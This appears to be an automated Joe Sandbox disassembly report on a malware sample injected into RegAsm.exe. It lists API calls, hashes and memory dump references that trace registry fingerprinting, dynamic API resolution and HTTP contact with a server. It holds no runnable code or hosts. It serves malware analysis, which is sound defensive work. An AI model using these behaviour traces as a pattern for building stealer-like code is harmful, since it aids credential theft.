                                                                                                                                                                                                                                                                                                  • GetEnvironmentVariableA.KERNEL32(0156F6E8,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,0000FFFF,?,?,?,?,00000000,00420210,000000FF,?,0040BCD3,01572100), ref: 004072B1
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FE20: lstrcpy.KERNEL32(00000000,004184C1), ref: 0040FE49
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FEB0: lstrlen.KERNEL32(00418579,?,00000000,?,00417CAD,00427387,00427386,00000000,?,00000000,00422CB8,000000FF,?,00418579), ref: 0040FEBB
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FEB0: lstrcpy.KERNEL32(00000000,00418579), ref: 0040FEF2
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFE0: lstrlen.KERNEL32(?,?,?,?,?,?,004218D9,000000FF,?,004184E7,?,01562F00,?), ref: 0041001C
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFE0: lstrcpy.KERNEL32(00000000), ref: 00410047
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFE0: lstrcat.KERNEL32(?,?), ref: 00410051
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FF50: lstrcpy.KERNEL32(00000000), ref: 0040FFB3
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FF50: lstrcat.KERNEL32(?,00000000), ref: 0040FFBF
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FF00: lstrcpy.KERNEL32(00000000), ref: 0040FF40
                                                                                                                                                                                                                                                                                                  • SetEnvironmentVariableA.KERNEL32(0156F6E8,00000000,00000000,?,0040BCD3,TjB,00426A54,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,00426A4F,?,?,?,00000000,00420210,000000FF), ref: 0040732E
                                                                                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(01571CA0,?,?,?,00000000,00420210,000000FF,?,0040BCD3), ref: 00407346
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • TjB, xrefs: 004072DA, 00407312, 004072DD
                                                                                                                                                                                                                                                                                                  • C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;, xrefs: 004072A6, 004072C4
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
                                                                                                                                                                                                                                                                                                  • String ID: C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;$TjB
                                                                                                                                                                                                                                                                                                  • API String ID: 2929475105-3266114336
                                                                                                                                                                                                                                                                                                  • Opcode ID: 3c6253b2ee137306e5b69380abe9ad6fab02b1930fa2895b56db71eb43332c6a
                                                                                                                                                                                                                                                                                                  • Instruction ID: ef5f06d785e981839736ef054ac1c91612f0bbff260fa06a83a8b7e256dd51d8
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3c6253b2ee137306e5b69380abe9ad6fab02b1930fa2895b56db71eb43332c6a
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 17416E70900615EFC720EFA4ED45EAA7BBAEB48B00F10553EF501A32E1DB786945CBA5
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 004153E0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 111sleepsynchronizationthreadCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • Sleep.KERNEL32(000003E8,00422591,PdA,?,?,?,00000001), ref: 004154A5
                                                                                                                                                                                                                                                                                                  • CreateThread.KERNEL32(00000000,00000000,00413E10,?,00000000,00000000), ref: 004154C6
                                                                                                                                                                                                                                                                                                  • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004154D2
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CreateObjectSingleSleepThreadWait
                                                                                                                                                                                                                                                                                                  • String ID: PdA$PdA
                                                                                                                                                                                                                                                                                                  • API String ID: 4198075804-199869184
                                                                                                                                                                                                                                                                                                  • Opcode ID: 89743936c7e81fd25222ad337d46cbc68b71f87488163e74c6bc97f1d91e7fef
                                                                                                                                                                                                                                                                                                  • Instruction ID: 58f52d09a55b75ac7dcb790bb2502d5d97770f71d094898c51def8a770c609ef
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 89743936c7e81fd25222ad337d46cbc68b71f87488163e74c6bc97f1d91e7fef
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EB416F34800248EECB11DFE5C941BDDBBB5AF19308F50807EE906632D2DB782B48CBA5
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 00410EE0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 47memoryregistryCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00410EF5
                                                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 00410EFC
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004101A0: GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 004101B5
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004101A0: HeapAlloc.KERNEL32(00000000), ref: 004101BC
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004101A0: RegOpenKeyExA.KERNEL32(80000002,0156B058,00000000,00020119,?), ref: 004101DB
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004101A0: RegQueryValueExA.KERNEL32(?,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 004101F5
                                                                                                                                                                                                                                                                                                  • RegOpenKeyExA.KERNEL32(80000002,0156B058,00000000,00020119,00000000), ref: 00410F31
                                                                                                                                                                                                                                                                                                  • RegQueryValueExA.KERNEL32(00000000,01571F68,00000000,00000000,00000000,000000FF), ref: 00410F4C
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Heap$AllocOpenProcessQueryValue
                                                                                                                                                                                                                                                                                                  • String ID: Windows 11
                                                                                                                                                                                                                                                                                                  • API String ID: 3676486918-2517555085
                                                                                                                                                                                                                                                                                                  • Opcode ID: 0f9789e40b6d6ed32b60a0afe372fa190980043e604808c8cf1738d179f2d46f
                                                                                                                                                                                                                                                                                                  • Instruction ID: 1edb6a64258ba8bc4fb645b0016c63393baf42ba23ff777e5691d4b5187ede9d
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0f9789e40b6d6ed32b60a0afe372fa190980043e604808c8cf1738d179f2d46f
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C3012678600219FBE720DBE0EC4AFAA777DEB05701F004265FF08D3240D6B4994087A0
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 004101A0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40memoryregistryCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 004101B5
                                                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 004101BC
                                                                                                                                                                                                                                                                                                  • RegOpenKeyExA.KERNEL32(80000002,0156B058,00000000,00020119,?), ref: 004101DB
                                                                                                                                                                                                                                                                                                  • RegQueryValueExA.KERNEL32(?,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 004101F5
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Heap$AllocOpenProcessQueryValue
                                                                                                                                                                                                                                                                                                  • String ID: CurrentBuildNumber
                                                                                                                                                                                                                                                                                                  • API String ID: 3676486918-1022791448
                                                                                                                                                                                                                                                                                                  • Opcode ID: 2acb556cf7e2dfb9990d1318b4fc1beb652e62fa517b2f843ef679346ea3aef1
                                                                                                                                                                                                                                                                                                  • Instruction ID: 19236cbb0df9c8bc93342aa8950c0f55e3fb02da4f2605f2dcdb39d085d0879d
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2acb556cf7e2dfb9990d1318b4fc1beb652e62fa517b2f843ef679346ea3aef1
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: ADF062B9941224FBE710DBE0EC4AFAB7B7DEB09B01F001155FB0596281E6B46A4487B5
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 00416F40 Relevance: 7.6, APIs: 5, Instructions: 145registrystringCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00416F81
                                                                                                                                                                                                                                                                                                  • RegOpenKeyExA.KERNEL32(80000001,01571CC0,00000000,00020119,00422A38), ref: 00416FA0
                                                                                                                                                                                                                                                                                                  • RegQueryValueExA.ADVAPI32(00422A38,015724F0,00000000,00000000,?,000000FF), ref: 00416FC4
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,?), ref: 00416FF3
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,01572328), ref: 00417007
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: lstrcat$OpenQueryValuememset
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 558315959-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: b9a42026017fe1b196d51f3e1b49c43ac35cad1c0513a4a5315a948c45c18dfa
                                                                                                                                                                                                                                                                                                  • Instruction ID: 2fe2cc2e18d61e3bc662a6b05acd439ca1ae1e36ea9499698c855c9158df25bc
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b9a42026017fe1b196d51f3e1b49c43ac35cad1c0513a4a5315a948c45c18dfa
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DC51E5B0940208ABCB14EFA4CC46FDE7779EB48704F00826DFA1567281EB74A749CBE5
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 00417C10 Relevance: 7.6, APIs: 3, Strings: 1, Instructions: 607networksleepCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FE20: lstrcpy.KERNEL32(00000000,004184C1), ref: 0040FE49
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FEB0: lstrlen.KERNEL32(00418579,?,00000000,?,00417CAD,00427387,00427386,00000000,?,00000000,00422CB8,000000FF,?,00418579), ref: 0040FEBB
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FEB0: lstrcpy.KERNEL32(00000000,00418579), ref: 0040FEF2
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004188E0: GetProcAddress.KERNEL32(74DD0000,01562700), ref: 004188F5
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004188E0: GetProcAddress.KERNEL32(74DD0000,01562740), ref: 0041890D
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004188E0: GetProcAddress.KERNEL32(74DD0000,0156DB58), ref: 00418926
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004188E0: GetProcAddress.KERNEL32(74DD0000,0156DC90), ref: 0041893E
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004188E0: GetProcAddress.KERNEL32(74DD0000,0156DC78), ref: 00418956
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004188E0: GetProcAddress.KERNEL32(74DD0000,0156DCA8), ref: 0041896F
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004188E0: GetProcAddress.KERNEL32(74DD0000,01563F80), ref: 00418987
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004188E0: GetProcAddress.KERNEL32(74DD0000,0156DD20), ref: 0041899F
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004188E0: GetProcAddress.KERNEL32(74DD0000,0156DCF0), ref: 004189B8
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004188E0: GetProcAddress.KERNEL32(74DD0000,0156DD08), ref: 004189D0
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004188E0: GetProcAddress.KERNEL32(74DD0000,0156DB70), ref: 004189E8
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004188E0: GetProcAddress.KERNEL32(74DD0000,01562720), ref: 00418A01
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004188E0: GetProcAddress.KERNEL32(74DD0000,015628C0), ref: 00418A19
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004188E0: GetProcAddress.KERNEL32(74DD0000,01562760), ref: 00418A31
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004188E0: GetProcAddress.KERNEL32(74DD0000,01562C60), ref: 00418A4A
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004188E0: GetProcAddress.KERNEL32(74DD0000,0156DD80), ref: 00418A62
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FF00: lstrcpy.KERNEL32(00000000), ref: 0040FF40
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FE60: lstrcpy.KERNEL32(00000000), ref: 0040FE88
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFE0: lstrlen.KERNEL32(?,?,?,?,?,?,004218D9,000000FF,?,004184E7,?,01562F00,?), ref: 0041001C
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFE0: lstrcpy.KERNEL32(00000000), ref: 00410047
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFE0: lstrcat.KERNEL32(?,?), ref: 00410051
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FF50: lstrcpy.KERNEL32(00000000), ref: 0040FFB3
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FF50: lstrcat.KERNEL32(?,00000000), ref: 0040FFBF
                                                                                                                                                                                                                                                                                                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00417EB0
                                                                                                                                                                                                                                                                                                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00417EC7
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410D30: GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00410D68
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410D30: GetVolumeInformationA.KERNEL32(00421A29,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00410DA1
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410D30: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00410DED
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410D30: HeapAlloc.KERNEL32(00000000), ref: 00410DF4
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00404500: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004045CA
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00404500: StrCmpCA.SHLWAPI(?,0156F958,?,?,?,?,?,?,00000000), ref: 004045EA
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004127A0: StrCmpCA.SHLWAPI(00000000,block,00000000,?,00417F3E), ref: 004127D8
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004127A0: ExitProcess.KERNEL32 ref: 004127E3
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00405CE0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00405DAA
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00405CE0: StrCmpCA.SHLWAPI(?,0156F958,?,?,?,?,?,?,00000000), ref: 00405DCA
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00412220: strtok_s.MSVCRT ref: 00412260
                                                                                                                                                                                                                                                                                                  • Sleep.KERNEL32(000003E8), ref: 004182B7
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00405CE0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405F54
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004135C0: strtok_s.MSVCRT ref: 004135FE
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004135C0: strtok_s.MSVCRT ref: 004136C1
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00411D10: memset.MSVCRT ref: 00411D4B
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00405CE0: HttpOpenRequestA.WININET(00000000,0156F8F8,?,015724D8,00000000,00000000,-00400100,00000000), ref: 00405F94
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00405CE0: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405FBB
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: AddressProc$Internetlstrcpy$Open$strtok_s$HeapProcesslstrcatlstrlen$AllocConnectDirectoryExitHttpInformationOptionRequestSleepVolumeWindowsmemset
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 3722462685-3916222277
                                                                                                                                                                                                                                                                                                  • Opcode ID: 12271ea2f4504a68fc960b10ed437e8ad1c9084cbdc0ba69338d80f575c8c776
                                                                                                                                                                                                                                                                                                  • Instruction ID: af4e92580bc7232f15382c81446c557bbd7ea1f76374bafb1c2556823289d0db
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 12271ea2f4504a68fc960b10ed437e8ad1c9084cbdc0ba69338d80f575c8c776
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 84329870D00358AACF10EBA5CD46BDDBB75AF19704F5441AEF50873282DB781B48CBA6
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 6C80C930 Relevance: 7.6, APIs: 5, Instructions: 83memoryCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetSystemInfo.KERNEL32(?), ref: 6C80C947
                                                                                                                                                                                                                                                                                                  • VirtualAlloc.KERNEL32(?,?,00002000,00000001), ref: 6C80C969
                                                                                                                                                                                                                                                                                                  • GetSystemInfo.KERNEL32(?), ref: 6C80C9A9
                                                                                                                                                                                                                                                                                                  • VirtualFree.KERNEL32(00000000,?,00008000), ref: 6C80C9C8
                                                                                                                                                                                                                                                                                                  • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001), ref: 6C80C9E2
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Virtual$AllocInfoSystem$Free
